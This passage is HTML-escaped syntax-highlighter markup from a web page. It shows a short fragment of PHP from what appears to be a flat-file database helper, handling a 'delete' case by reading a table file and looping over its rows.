id=&quot;crayon-5c677473e1a7b199319094-77&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;break&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-78&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-79&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;case&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;delete&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-80&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbGetPath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$table&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-81&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;!&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Error4&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-82&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbReadFile&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-83&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$whereColumn&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$query&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-84&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$whereValue&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$query&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-85&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$countRow&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;count&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-86&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$chk&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-87&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;for&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;count&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) 